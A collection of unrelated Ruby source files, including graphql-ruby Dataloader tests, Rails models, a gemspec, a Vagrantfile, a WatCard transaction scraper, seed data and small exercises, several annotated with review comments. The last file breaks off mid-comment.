    res = FiberSchema.execute("{ __typename }", context: { dataloader: GraphQL::Dataloader.new(nonblocking: true) })
    assert res.context.dataloader.nonblocking?
    res = FiberSchema.multiplex([{ query: "{ __typename }" }], context: { dataloader: GraphQL::Dataloader.new(nonblocking: true) })
    assert res[0].context.dataloader.nonblocking?
    Fiber.set_scheduler(nil)
  end
end
describe "#run_isolated" do
  module RunIsolated
    # Counts every id it has ever fetched; the running count doubles as the
    # returned value, which makes batch sizes visible in the results.
    class CountSource < GraphQL::Dataloader::Source
      def fetch(ids)
        @count ||= 0
        @count += ids.size
        ids.map { |_id| @count }
      end
    end
  end

  it "uses its own queue" do
    dl = GraphQL::Dataloader.new
    result = {}
    dl.append_job { result[:a] = 1 }
    dl.append_job { result[:b] = 2 }
    dl.append_job { result[:c] = 3 }
    # run_isolated runs only its own block — not previously appended jobs:
    dl.run_isolated { result[:d] = 4 }
    assert_equal({ d: 4 }, result)
    dl.run_isolated {
      _r1 = dl.with(RunIsolated::CountSource).request(1)
      _r2 = dl.with(RunIsolated::CountSource).request(2)
      r3 = dl.with(RunIsolated::CountSource).request(3)
      # This is going to `Fiber.yield`
      result[:e] = r3.load
    }
    # All three requests above batched into one fetch, so the count is 3:
    assert_equal({ d: 4, e: 3 }, result)
    # The originally appended jobs are still queued and run now:
    dl.run
    assert_equal({ a: 1, b: 2, c: 3, d: 4, e: 3 }, result)
  end

  it "shares a cache" do
    dl = GraphQL::Dataloader.new
    result = {}
    dl.run_isolated {
      _r1 = dl.with(RunIsolated::CountSource).request(1)
      _r2 = dl.with(RunIsolated::CountSource).request(2)
      r3 = dl.with(RunIsolated::CountSource).request(3)
      # Run all three of the above requests:
      result[:a] = r3.load
    }
    dl.append_job {
      # This should return cached from above
      result[:b] = dl.with(RunIsolated::CountSource).load(1)
    }
    dl.append_job {
      # This one is run by itself
      result[:c] = dl.with(RunIsolated::CountSource).load(4)
    }
    assert_equal({ a: 3 }, result)
    dl.run
    assert_equal({ a: 3, b: 3, c: 4 }, result)
  end
end
# Dataloader work runs in fibers; this verifies the parent thread's
# thread-local variables are visible from inside a source's fetch.
describe "thread local variables" do
  module ThreadVariable
    class Type < GraphQL::Schema::Object
      field :key, String, null: false
      field :value, String, null: false
    end

    class Source < GraphQL::Dataloader::Source
      # Reads Thread.current inside the fetch fiber.
      def fetch(keys)
        keys.map { |key| OpenStruct.new(key: key, value: Thread.current[key.to_sym]) }
      end
    end

    class QueryType < GraphQL::Schema::Object
      field :thread_var, ThreadVariable::Type do
        argument :key, GraphQL::Types::String
      end

      def thread_var(key:)
        dataloader.with(ThreadVariable::Source).load(key)
      end
    end

    class Schema < GraphQL::Schema
      query ThreadVariable::QueryType
      use GraphQL::Dataloader
    end
  end

  it "sets the parent thread locals in the execution fiber" do
    Thread.current[:test_thread_var] = 'foobarbaz'
    result = ThreadVariable::Schema.execute(<<-GRAPHQL)
    {
      threadVar(key: "test_thread_var") {
        key
        value
      }
    }
    GRAPHQL
    expected_result = {
      "data" => {
        "threadVar" => { "key" => "test_thread_var", "value" => "foobarbaz" }
      }
    }
    assert_equal expected_result, result.to_h
  end
end
describe "dataloader calls from inside sources" do
  # Sources may themselves call dataloader.with(...).load_all, nesting
  # source resolution one (Nested) or two (Nested2) levels deep.
  class NestedDataloaderCallsSchema < GraphQL::Schema
    class Echo < GraphQL::Dataloader::Source
      def fetch(keys)
        keys
      end
    end

    class Nested < GraphQL::Dataloader::Source
      def fetch(keys)
        dataloader.with(Echo).load_all(keys)
      end
    end

    class Nested2 < GraphQL::Dataloader::Source
      def fetch(keys)
        dataloader.with(Nested).load_all(keys)
      end
    end

    class QueryType < GraphQL::Schema::Object
      field :nested, String
      field :nested2, String

      def nested
        dataloader.with(Nested).load("nested")
      end

      def nested2
        dataloader.with(Nested2).load("nested2")
      end
    end

    query QueryType
    use GraphQL::Dataloader
  end
end

# NOTE(review): this `it` sits after the describe's closing `end`, but the
# schema class above is defined at top level so it remains reachable.
it "loads data from inside source methods" do
  assert_equal({ "data" => { "nested" => "nested" } }, NestedDataloaderCallsSchema.execute("{ nested }"))
  assert_equal({ "data" => { "nested2" => "nested2" } }, NestedDataloaderCallsSchema.execute("{ nested2 }"))
  assert_equal({ "data" => { "nested" => "nested", "nested2" => "nested2" } }, NestedDataloaderCallsSchema.execute("{ nested nested2 }"))
end
# authorized? hooks that return Procs are resolved lazily (lazy_resolve);
# dataloader results must still thread through them correctly.
describe "with lazy authorization hooks" do
  class LazyAuthHookSchema < GraphQL::Schema
    class Source < ::GraphQL::Dataloader::Source
      def fetch(ids)
        return ids.map {|i| i * 2}
      end
    end

    class BarType < GraphQL::Schema::Object
      field :id, Integer
      def id
        object
      end

      # Lazy authorization: returns a Proc, resolved via `lazy_resolve` below.
      def self.authorized?(object, context)
        -> { true }
      end
    end

    class FooType < GraphQL::Schema::Object
      field :dataloader_value, BarType

      def self.authorized?(object, context)
        -> { true }
      end

      def dataloader_value
        dataloader.with(Source).load(1)
      end
    end

    class QueryType < GraphQL::Schema::Object
      field :foo, FooType
      def foo
        {}
      end
    end

    use GraphQL::Dataloader
    query QueryType
    lazy_resolve Proc, :call
  end

  it "resolves everything" do
    # NOTE(review): `"""..."""` is adjacent-string concatenation in Ruby
    # ("" + "..."), not a docstring; a heredoc would be clearer.
    dataloader_query = """
    query {
      foo {
        dataloaderValue {
          id
        }
      }
    }
    """
    dataloader_result = LazyAuthHookSchema.execute(dataloader_query)
    assert_equal 2, dataloader_result["data"]["foo"]["dataloaderValue"]["id"]
  end
end
end
|
# A short user-authored post, capped at 140 characters.
class Micropost < ApplicationRecord
  belongs_to :user

  # Content is mandatory and limited to 140 characters.
  validates :content, presence: true, length: { maximum: 140 }
end
|
# A user's history, linked to cloths through the cloths_histories join model.
class History < ActiveRecord::Base
  belongs_to :user

  # Declare the join association first, then the through association it backs.
  has_many :cloths_histories
  has_many :cloths, through: :cloths_histories

  accepts_nested_attributes_for :cloths_histories
end
|
# This class represents a table where each row (renglon) holds columns with
# values associated with that row and column.
class Reporte
  EXTENDIDO = 101
  # NOTE(review): a numeric literal with a leading zero is OCTAL in Ruby, so
  # this constant is 8, not 10 — confirm whether "010" was meant literally.
  REDUCIDO = 010
  attr_reader :titulo
  attr_reader :total
  attr_reader :estilo

  # Class-level accessor pair for shared report data.
  def self.datos_a=(datos)
    @datos_a = datos
  end

  def self.datos_a
    return @datos_a
  end

  # Returns the first row whose estado equals the given one, or nil.
  def busca_estado(estado)
    for renglon in @renglones_reporte
      if renglon.estado.eql? estado
        return renglon
      end
    end
  end

  # Initializes the array that will hold RenglonReporte instances.
  def initialize(nombre, estilo)
    @titulo = nombre
    @estilo = estilo
    @renglones_reporte = Array.new
    @numero = 0
    @total = nil
  end

  # Appends a RenglonReporte to the row set; raises ArgumentError for
  # anything else.
  def agrega_renglon(renglon)
    if renglon.instance_of? RenglonReporte
      @renglones_reporte << renglon
    else
      raise ArgumentError.new("El objeto no es del tipo esperado : RenglonReporte")
    end
  end

  # Builds the summary row keyed by 'Total': per-column totals across all
  # rows plus each column's percentage of the grand total.
  # Assumes every row has a "Total" column — TODO confirm.
  def genera_renglon_total
    total = Hash.new
    @renglones_reporte.each do |renglon|
      renglon.columnas.keys.each do |columna|
        if total[columna].nil?
          total[columna] = {:total => renglon.columnas[columna][:total], :promedio => 0}
        else
          total[columna][:total] += renglon.columnas[columna][:total]
        end
      end
    end
    total_t = total["Total"][:total]
    total["Total"][:promedio] = 100
    total.keys.each do |key|
      begin
        # Percentage of the grand total; the bare rescue covers the
        # FloatDomainError raised by rounding NaN/Infinity when total_t is 0.
        total[key][:promedio] = (total[key][:total]/total_t.to_f*100).round
      rescue
        total[key][:promedio] = 0
      end
    end
    @total = total
  end

  # Returns the row set.
  def renglones
    @renglones_reporte
  end

  # Chart data: maps each column id to its percentage of the grand total.
  def renglon_a_grafica
    genera_renglon_total
    devuelto = Hash.new
    @renglones_reporte[0].id_columnas.each do |key|
      devuelto[key] = @total[key][:promedio]
    end
    devuelto
  end

  # Returns the list of estados (states) of this report.
  def estados
    devuelto = Array.new
    @renglones_reporte.each do |renglon|
      devuelto << renglon.estado
    end
    devuelto
  end

  # Returns the list of column identifiers (taken from the first row).
  def columnas
    @renglones_reporte[0].id_columnas
  end

  # Manual accessor pair for the report number.
  def numero=(num)
    @numero = num
  end

  def numero
    @numero
  end
end
|
# coding: utf-8
# Put lib/ on the load path so the version constant can be required below.
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'jekyll-pypedown/version'

# Gem specification for jekyll-pypedown.
Gem::Specification.new do |spec|
  spec.name = "jekyll-pypedown"
  spec.version = Jekyll::Pypedown::VERSION
  spec.summary = "Pygments + Typogruby + kramdown for Jekyll"
  spec.description = "A Jekyll plugin that enables Pygments syntax highlighting for kramdown-parsed fenced code blocks."
  spec.authors = ["Paul Robert Lloyd"]
  spec.email = "me+rubygems@paulrobertlloyd.com"
  spec.files = Dir.glob("lib/**/*.rb")
  spec.homepage = "https://github.com/paulrobertlloyd/jekyll-pypedown"
  spec.license = "MIT"

  # Runtime dependencies, pinned pessimistically.
  spec.add_dependency "jekyll", "~> 2.4"
  spec.add_dependency "pygments.rb", "~> 0.6"
  spec.add_dependency "typogruby", "~> 1.0"
  spec.add_dependency "kramdown", "~> 1.4"
end
|
require "base_parser"
require "single_crochet"
require "double_crochet"
require "slip_stitch"
require "stitch_factory"
module Parsers
  # Parses basic stitch instructions (e.g. "sc 3") into stitch objects.
  class BasicStitchParser < Parsers::BaseParser
    def initialize(instructions)
      @instructions = instructions.downcase.strip
      @stitch_factory = StitchFactory.new
    end

    # Returns the parsed stitch, wrapped in a RepeatInstruction when the
    # instruction carries a repeat count greater than 1; returns nil when
    # the instructions are not parsable by this parser.
    def parse
      return unless self.class.parsable?(@instructions)
      stitch_to_parse = @instructions[self.class.basic_stitch_regex]
      basic_stitch = @stitch_factory.get_stitch(stitch_to_parse)
      repeat_times = @instructions[self.class.digit_regex].to_i
      if repeat_times > 1
        RepeatInstruction.new(repeat_times, [*basic_stitch])
      else
        basic_stitch
      end
    end

    # True when the text contains a known basic stitch abbreviation.
    def self.parsable?(inst)
      !inst.downcase.strip[basic_stitch_regex].nil?
    end

    # FIX: the original placed a bare `private` before these singleton
    # methods — `private` has no effect on `def self.` methods, so they were
    # always public. The misleading keyword is removed. (Making them truly
    # private with private_class_method would break the
    # `self.class.basic_stitch_regex` call in #parse.)

    # Memoized list of abbreviations for all basic stitch classes.
    def self.basic_stitch_abbrevs
      @basic_stitches ||= Stitches::BASIC.map do |stitch|
        Module.const_get(stitch).abbrev
      end
    end

    # Alternation regex matching any basic stitch abbreviation.
    def self.basic_stitch_regex
      /#{basic_stitch_abbrevs.join("|")}/
    end
  end
end
|
module Hotel
  # A room booking covering the half-open date range [check_in, check_out).
  class Reservation
    attr_reader :room, :check_in, :check_out

    # Validates the date range before storing anything.
    def initialize(room, check_in, check_out)
      check_date_range(check_in, check_out)
      @room = room
      @check_in = check_in
      @check_out = check_out
    end

    # Raises StandardError unless check_out is strictly after check_in.
    def check_date_range(check_in, check_out)
      raise StandardError, "Invalid date range provided" if check_out <= check_in
    end

    # Nightly room cost times the whole number of nights reserved.
    def reservation_cost
      (check_out - check_in).to_i * room.cost
    end
  end
end
|
# Interactive trip-booking script: pick a plan, enter the party size,
# apply a 10% discount for groups of 5+, then print the total (in yen).
puts <<~TEXT
旅行プランを選択して下さい。
1. 沖縄旅行(10000円)
2. 北海道旅行(20000円)
3. 九州旅行(15000円)
TEXT

# Keep prompting until a valid plan number (1-3) is entered.
while true
  print "プランの番号を選択 > "
  plan_num = gets.to_i
  break if (1..3).include?(plan_num)
  puts "1以上を入力して下さい。"
end

# Map the chosen plan to its destination name and price in yen.
case plan_num
when 1
  place = "沖縄旅行"
  price = 10000
when 2
  place = "北海道旅行"
  price = 20000
when 3
  place = "九州旅行"
  price = 15000
end

puts "#{place}ですね。"
puts "何名で予約されますか?"

# Keep prompting until the party size is at least 1.
while true
  print "人数を入力 > "
  join_member_num = gets.to_i
  break if join_member_num >= 1
  puts "1以上を入力して下さい。"
end
puts "#{join_member_num}名ですね。"

total_price = join_member_num * price
# Groups of 5+ get 10% off; total becomes a Float here and is floored below.
if join_member_num >= 5
  puts "5人以上なので10%割引になります。"
  total_price *= 0.9
end
puts "合計料金は#{total_price.floor}円になります。"
class Person < ApplicationRecord
  # Assoc

  # Validations
  validates :age, numericality: {
    less_than_or_equal_to: 150
  }
  validates :name, :age, :gender, presence: true
  # BUG FIX: `validates :alive, presence: true` rejects the value `false`
  # (presence fails for false), so a not-alive person could never be saved.
  # Booleans must be validated with inclusion instead.
  validates :alive, inclusion: { in: [true, false] }

  # Methods
  # class method
  def self.order_by_age
    order(:age)
  end

  # instance method

  # callback
  before_save :set_alive
  # Forces alive=true on every save, including updates.
  # NOTE(review): combined with the validation above this means `alive` can
  # never persist as false — confirm that is intended.
  def set_alive
    self.alive = true
  end
end
|
#--
# Copyright (c) 2009-2010, John Mettraux, jmettraux@gmail.com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Made in Japan.
#++
module Rufus
module Tokyo

  #
  # A mixin for Cabinet and Map, gathers all the hash-like methods
  #
  # Including classes provide get(k)/[]=/keys; this module layers the rest
  # of the Hash-like API (each, values, to_h, merge, defaults) on top.
  #
  module HashMethods

    include Enumerable

    attr_accessor :default_proc

    # The [] methods
    #
    # (assumes there's an underlying get(k) method)
    #
    # Falls back to default_proc (Hash-style) when the key is missing.
    #
    def [] (k)
      val = get(k)
      return val unless val.nil?
      return nil unless @default_proc
      @default_proc.call(self, k)
    end

    # Returns an array of all the values
    #
    def values
      collect { |k, v| v }
    end

    # Our classical 'each'
    #
    # Tries three strategies, fastest first: Edo's C iterator, Tokyo's FFI
    # abstract iterator, and finally a plain keys() + lookup loop.
    #
    def each
      #
      # drop to Edo's C API calls to avoid two-step iteration
      # (keys() then each())
      #
      if defined?(@db) and %w[iterinit iternext].all? { |m| @db.respond_to?(m) }
        @db.iterinit
        while k = @db.iternext
          yield(k, self[k])
        end
      #
      # drop to Tokyo's FFI calls to avoid two-step iteration
      # (keys() then each())
      #
      elsif self.class.name != "Rufus::Tokyo::Table" and # use String for Edo
        defined?(@db) and
        respond_to?(:lib) and
        %w[abs_iterinit abs_iternext].all? { |m| lib.respond_to?(m) }
        begin
          lib.abs_iterinit(@db)
          # `int` receives each key's byte length from the C side.
          int = FFI::MemoryPointer.new(:int)
          loop do
            key_pointer = lib.abs_iternext(@db, int)
            # A NULL pointer signals end of iteration.
            break if key_pointer.address.zero?
            k = key_pointer.get_bytes(0, int.get_int(0))
            yield(k, self[k])
          end
        ensure
          # Always release the native buffer, even if the block raises.
          int.free if int
        end
      # we couldn't do it fast, so go ahead with slow-but-accurate
      else
        keys.each { |k| yield(k, self[k]) }
      end
    end

    # Turns this instance into a Ruby hash
    #
    def to_h
      self.inject({}) { |h, (k, v)| h[k] = v; h }
    end

    # Turns this instance into an array of [ key, value ]
    #
    def to_a
      #self.collect { |e| e }
      # not OK with ruby 1.9.1
      self.inject([]) { |a, (k, v)| a << [ k, v ]; a }
    end

    # Returns a new Ruby hash which is a merge of this Map and the given hash
    #
    def merge (h)
      self.to_h.merge(h)
    end

    # Merges the entries in the given hash into this map
    #
    def merge! (h)
      h.each { |k, v| self[k] = v }
      self
    end

    # Returns the default value, the value that would be returned by h[k] if
    # k did not exist among h keys.
    #
    def default (key=nil)
      return nil unless @default_proc
      @default_proc.call(self, key) rescue nil
    end

    # Sets the default value for the Hash.
    #
    # Warning : use #default_proc= if you want to change the default_proc
    # directly.
    #
    def default= (val)
      @default_proc = val.nil? ? nil : lambda { |h, k| val }
    end
  end
end
end
|
# Transactional mail for user accounts.
class UserMailer < ApplicationMailer
  default from: 'DONOTREPLY@ucsdmun.org'

  # Welcome message; the login URL is built by appending the user's email.
  def welcome_email(user, url)
    @user = user
    @url = url + user.email.to_s
    mail(to: @user.email, subject: 'Welcome to Model United Nations at UCSD')
  end

  # Notifies the user that their password was changed.
  def change_password_mail(user)
    @user = user
    mail(to: @user.email, subject: 'Your Password changed.')
  end

  # Notifies the user about a newly created contact.
  def new_contact_mail(user, contact)
    @contact = contact
    mail(to: user.email, subject: 'New Contact')
  end
end
|
require 'spec_helper'

# Uses the RR mocking syntax (mock/dont_allow) and the legacy `.should`
# expectation style.
describe RabbitJobs::Consumer::JobConsumer do
  let(:consumer) { RabbitJobs::Consumer::JobConsumer.new }
  let(:job) { TestJob.new }

  describe '#process_message' do
    it 'parses job' do
      payload = RJ::Job.serialize(TestJob)
      mock(RJ::Job).parse(payload) { job }
      consumer.process_message(:delivery_info, :properties, payload)
    end

    it 'reports parsing errors' do
      payload = 'some bad json data'
      mock(consumer).report_error(:parsing_error, payload)
      # Returns true so the broker message is still acked when unparsable.
      consumer.process_message(:delivery_info, :properties, payload).should == true
    end

    it 'skips expired jobs' do
      payload = RJ::Job.serialize(TestJob)
      # Force the let-binding to evaluate before TestJob.new is stubbed.
      job
      mock(TestJob).new { job }
      mock(job).expired? { true }
      dont_allow(job).run_perform
      consumer.process_message(:delivery_info, :properties, payload)
    end

    it 'executes job.perform' do
      payload = RJ::Job.serialize(TestJob)
      job
      mock(TestJob).new { job }
      mock(job).run_perform
      consumer.process_message(:delivery_info, :properties, payload)
    end
  end

  describe '#report_error' do
    it 'accepts error type :not_found' do
      -> { consumer.report_error(:not_found, 'klass_name') }.should_not raise_error
    end

    it 'accepts error type :parsing_error' do
      -> { consumer.report_error(:parsing_error, 'payload data') }.should_not raise_error
    end

    it 'accepts error type :error' do
      # Build a real exception (with backtrace) by raising and rescuing it.
      exception = nil
      begin
        fail 'testing'
      rescue RuntimeError => e
        exception = e
      end
      -> { consumer.report_error(:error, exception, 'payload data') }.should_not raise_error
    end
  end
end
|
# -*- mode: ruby -*-
# vi: set ft=ruby :
# All Vagrant configuration is done below. The "2" in Vagrant.configure
# configures the configuration version (we support older styles for
# backwards compatibility). Please don't change it unless you know what
# you're doing.
Vagrant.configure(2) do |config|
  # The most common configuration options are documented and commented below.
  # For a complete reference, please see the online documentation at
  # https://docs.vagrantup.com.

  # Base box: VMware build of Ubuntu 12.04 "precise".
  #config.vm.box = "opscode_ubuntu_trusty_vmware"
  config.vm.box = "precise64_vmware"
  config.vm.box_url = "http://files.vagrantup.com/precise64_vmware.box"
  #config.vm.box = "opscode_precise64_vbox"
  #config.vm.box_url = "http://opscode-vm-bento.s3.amazonaws.com/vagrant/virtualbox/opscode_ubuntu-14.04_chef-provisionerless.box"

  config.vm.provider "vmware_fusion" do |v|
    v.vmx["memsize"] = "2048"
    v.vmx["numvcpus"] = "2"
  end
  #config.vm.provider "virtualbox" do |vb|
  #  # Display the VirtualBox GUI when booting the machine
  #  vb.gui = true
  #
  #  # Customize the amount of memory on the VM:
  #  vb.memory = "2048"
  #  vb.cpus = "2"
  #end

  # Two-node Spark cluster on a host-only network.
  config.vm.define "spark_master", primary: true do |spark|
    spark.vm.network "private_network", ip: "192.168.101.211"
  end
  config.vm.define "spark_node" do |spark|
    spark.vm.network "private_network", ip: "192.168.101.212"
  end

  config.vm.provision "chef_solo" do |chef|
    require 'yaml'
    # BUG FIX: this local was previously named `config`, shadowing Vagrant's
    # outer `config` block variable for the rest of the provision block.
    # Renamed to `secrets` to remove the footgun.
    secrets = YAML.load_file "secrets.yaml"
    user = secrets.fetch("user")
    pass = secrets.fetch("pass")
    chef.json = { "dse" =>
      {
        "repo_user" => user ,
        "repo_pass" => pass
      }
    }
    chef.add_recipe "dse"
  end
end
|
require "nokogiri"
require "net/http"
require "uri"
require "time"
require "facets"
require "yaml"
module Watcard
  # Fetches WatCard transaction history from the UW account site and
  # reformats it: raw scraping, meal classification, and ledger output.
  class History
    def initialize(config)
      @conf = config
    end

    # Logs to stderr so stdout stays clean for ledger output.
    def log(msg)
      STDERR.puts msg
    end

    # POSTs the history form for a single day; returns the HTTP response.
    def history_page(date)
      uri = URI.parse("https://account.watcard.uwaterloo.ca/watgopher661.asp")
      date_txt = date.strftime("%m/%d/%Y")
      args = {
        "acnt_1"=>@conf['id'],
        "acnt_2"=>@conf['pin'],
        "DBDATE"=>date_txt,
        "DEDATE"=>date_txt,
        "PASS"=>"PASS",
        "STATUS"=>"HIST",
        "watgopher_title"=>"WatCard History Report",
        "watgopher_regex"=>'<hr>([\s\S]*wrong[\s\S]*)<p></p>|(<form[\s\S]*?(</center>|</form>))|(<pre><p>[\s\S]*</pre>)',
        "watgopher_style"=>'onecard_narrow',
      }
      log "# Fetching history for #{date}"
      Net::HTTP.post_form(uri, args)
    end

    # Maps raw terminal codes to friendly location names; unknown codes are
    # returned stripped but otherwise untouched.
    def parse_loc(loc)
      return "V1 Cafeteria" if loc =~ /WAT-FS-V1/
      return "Liquid Assets" if loc =~ /WAT-FS-LA/
      return "V1 Laundry" if loc =~ /V1 LAUNDRY/
      return "V1 Front Desk" if loc =~ /V1DESK/
      return "Media.Doc" if loc =~ /MEDIA.DOC/
      return "Student Health Pharmacy" if loc =~ /STUDENT HEALTH/
      loc.strip
    end

    # Scrapes one day's transactions into an array of hashes, oldest first.
    def history(date)
      page_body = history_page(date).body
      doc = Nokogiri::HTML(page_body)
      table = doc.css('#oneweb_financial_history_table')
      table.xpath('.//tr').map do |row|
        cols = row.xpath('./td').map(&:inner_text)
        # Skip header/malformed rows.
        next if cols.length < 4
        # NOTE(review): cols[3] is used both as a doubling flag here and as
        # the account index (:balance) below — confirm the column layout.
        mult = (cols[3] == "1") ? 2 : 1
        {
          time: Time.parse(cols[1], date),
          amount: -(cols[2].strip.to_f)*mult,
          loc: parse_loc(cols.last),
          raw_loc: cols.last,
          balance: cols[3].to_i
        }
      end.compact.reverse
    end

    # Tags each transaction with a :meal type, inferred from location first
    # and otherwise from the hour of day.
    def add_transaction_types(hist)
      hist.each do |a|
        h = a[:time].hour
        type = if a[:loc] =~ /laundry/i
          "Laundry"
        elsif a[:loc] =~ /media|desk/i
          "Printing"
        elsif a[:loc] =~ /pharmacy/i
          "Health Supplies"
        elsif h < 11
          "Breakfast"
        elsif h < 17
          "Lunch"
        else
          "Dinner"
        end
        a[:meal] = type
      end
    end

    # Collapses consecutive transactions of the same meal type into one
    # (summing amounts). NOTE: mutates hist via shift.
    def bundle_transactions(hist)
      return hist if hist.empty?
      meals = [hist.shift]
      hist.each do |a|
        # if last meal is same type treat them as one
        if a[:meal] == meals.last[:meal]
          meals.last[:amount] += a[:amount]
        else
          meals << a
        end
      end
      meals
    end

    # Attaches the ledger account pair for each transaction's :balance
    # index, defaulting to accounts[4].
    def add_accounts(hist)
      accounts = @conf['accounts']
      hist.each do |a|
        a[:account] = accounts[a[:balance]] || accounts[4]
      end
    end

    # Fetches, classifies, and bundles one day's transactions.
    def fetch_meals(days_ago)
      hist = history(Time.now.less(days_ago, :days))
      return hist if hist.empty?
      add_transaction_types(hist)
      bundle_transactions(hist)
    end

    # Formats one bundled transaction as a ledger entry (heredoc preserves
    # the exact output layout).
    def ledger_transaction(m)
      date_str = m[:time].strftime("%Y/%m/%d")
      transact = <<END
#{date_str} #{m[:meal]} at #{m[:loc]}
#{m[:account][0]}  $#{sprintf('%.2f', m[:amount])}
#{m[:account][1]}
END
    end

    # Prints the entries and, when interactive and configured, offers to
    # append them to the ledger file.
    def ledger_append_prompt(out)
      puts out
      if STDIN.tty? && @conf['ledger']
        print "# Add to file [yN]: "
        ans = gets.chomp
        exit if ans != "y"
        file = File.expand_path(@conf['ledger'])
        File.open(file, 'a') {|f| f.puts out}
        puts "# Added to #{file}"
      end
    end

    # All of one day's bundled transactions as a single ledger string.
    def ledger_transactions(days_ago)
      meals = fetch_meals(days_ago)
      add_accounts(meals)
      meals.map {|m| ledger_transaction(m)}.join('')
    end

    def output_ledger(days_ago)
      log "# Transactions for #{days_ago} days ago"
      out = ledger_transactions(days_ago)
      ledger_append_prompt(out)
    end

    # Emits every day's transactions since the last date recorded in the
    # ledger file.
    def output_ledger_all
      start = (Date.today - last_ledger_add).to_i - 1
      puts "# Fetching transactions since #{start} days ago"
      days = []
      start.downto(0).each do |days_ago|
        days << ledger_transactions(days_ago)
      end
      out = days.join('')
      log "# Transactions since #{start} days ago:"
      ledger_append_prompt(out)
    end

    # Human-readable daily summary with an optional budget comparison.
    def output_history(days_ago)
      meals = fetch_meals(days_ago)
      puts "No Transactions" if meals.empty?
      total = 0
      meals.each do |m|
        total += m[:amount] if m[:balance] == 1
        puts "#{m[:meal]}: $#{sprintf('%.2f', m[:amount])} @ #{m[:loc]}"
      end
      budget = @conf['budget']
      print "= $#{total}"
      print " out of $#{budget} surplus: #{sprintf('%.2f',budget-total)}" if budget
      puts ''
    end

    # Dumps the raw (unbundled) day as YAML, for debugging.
    def output_raw_history(days_ago)
      hist = history(Time.now.less(days_ago, :days))
      add_transaction_types(hist)
      puts YAML.dump(hist)
    end

    # Date of the most recent entry in the ledger file (today when no
    # ledger is configured).
    def last_ledger_add
      return Date.today unless @conf['ledger']
      file = File.expand_path(@conf['ledger'])
      ledger = IO.read(file)
      Date.parse(ledger.scan(/\d+\/\d+\/\d+/).last)
    end
  end
end
|
# This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
#   movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
#   Character.create(name: 'Luke', movie: movies.first)

# Mechanics on staff.
[
  ['Meg Stang', 5],
  ['Corey Westerfield', 2],
  ['Mike Dao', 4]
].each { |name, years| Mechanic.create(name: name, years_of_experience: years) }

# Parks with their admission price and [ride name, thrill rating] lists.
{
  'Six Flags' => [50, [['Mr. Twister', 8], ['Sidebender', 10], ['Tower of Doom', 7], ['Cups', 2]]],
  'Lakeside' => [10, [['The Hulk', 6], ['SpiderMan', 8], ['Batman', 3], ['Superman', 4]]],
  'DisneyLand' => [100, [['Soaring of California', 3], ['Winnie the Pooh', 2], ['Its a Small World Afterall', 1], ['Peter Pan', 4]]]
}.each do |park_name, (price, rides)|
  park = AmusementPark.create(name: park_name, admission_price: price)
  rides.each { |ride_name, thrill| park.rides.create(name: ride_name, thrill_rating: thrill) }
end
|
# Multiply Lists
# Write a method that takes two Array arguments in which each Array contains a list of numbers, and returns a new Array that contains the product of each pair of numbers from the arguments that have the same index. You may assume that the arguments contain the same number of elements.

# Returns the element-wise products of arr and arr_two.
# FIX: the original kept a manual counter `i` that shadowed the
# each_with_index block parameter and was never used; zip expresses the
# index pairing directly.
def multiply_list(arr, arr_two)
  arr.zip(arr_two).map { |a, b| a * b }
end

p multiply_list([3, 5, 7], [9, 10, 11]) == [27, 50, 77]
|
require './input_functions'
# Numeric genre codes 1..4; index 0 is unused, mirroring $genre_names below.
module Genre
  POP, CLASSIC, JAZZ, ROCK = *1..4
end

# Display names indexed by genre code; 'Null' pads index 0.
# NOTE(review): a global variable — a frozen constant would be preferable.
$genre_names = ['Null', 'Pop', 'Classic', 'Jazz', 'Rock']
# A playable track: a display name plus the path of its audio file.
class Track
  attr_accessor :name, :location

  def initialize(name, location)
    @name, @location = name, location
  end
end
# An album: title, artist, genre display name, and its array of Tracks.
class Album
  attr_accessor :title, :artist, :genre, :tracks

  def initialize(title, artist, genre, tracks)
    @title, @artist, @genre, @tracks = title, artist, genre, tracks
  end
end
# Reads in and returns a single track from the terminal.
# index is zero-based; the prompts display it one-based.
def read_track index
  track_name = read_string('Please enter track No.' + (index + 1).to_s + ' name.')
  track_file_location = read_string('Please enter track No.' + (index + 1).to_s + ' file location.')
  track = Track.new(track_name, track_file_location)
  track
end
# Reads in and returns an array of multiple tracks from the terminal.
# Prompts for a track count (0..15) and then reads that many tracks.
def read_tracks
  count = read_integer_in_range("Enter track count: ", 0, 15)
  # Idiom fix: Array.new(count) with a block replaces the manual while loop.
  Array.new(count) { |i| read_track(i) }
end
# Display the genre names in a numbered list and ask the user to select one.
# Returns the chosen index into $genre_names.
def read_genre()
  count = $genre_names.length
  puts 'Genre: '
  # Idiom fixes: each_with_index replaces the manual while-loop counter,
  # and the camelCase local `selectedGenre` is gone.
  $genre_names.each_with_index do |name, i|
    puts "#{i} " + name
  end
  read_integer_in_range('Please select your album genre.', 0, count - 1)
end
# Reads in and returns a single album from the terminal, with all its tracks
def read_album
  album_title = read_string("Please enter album title.")
  album_artist = read_string("Please enter album artist.")
  # read_genre returns an index; store the genre's display name, not the index
  album_genre = $genre_names[read_genre].to_s
  tracks = read_tracks
  album = Album.new(album_title, album_artist, album_genre, tracks)
  album
end
# Takes an array of tracks and prints each one's name and file location
# under a numbered banner.
# FIX: the original `for i in 0...tracks.length` loop contained a dead
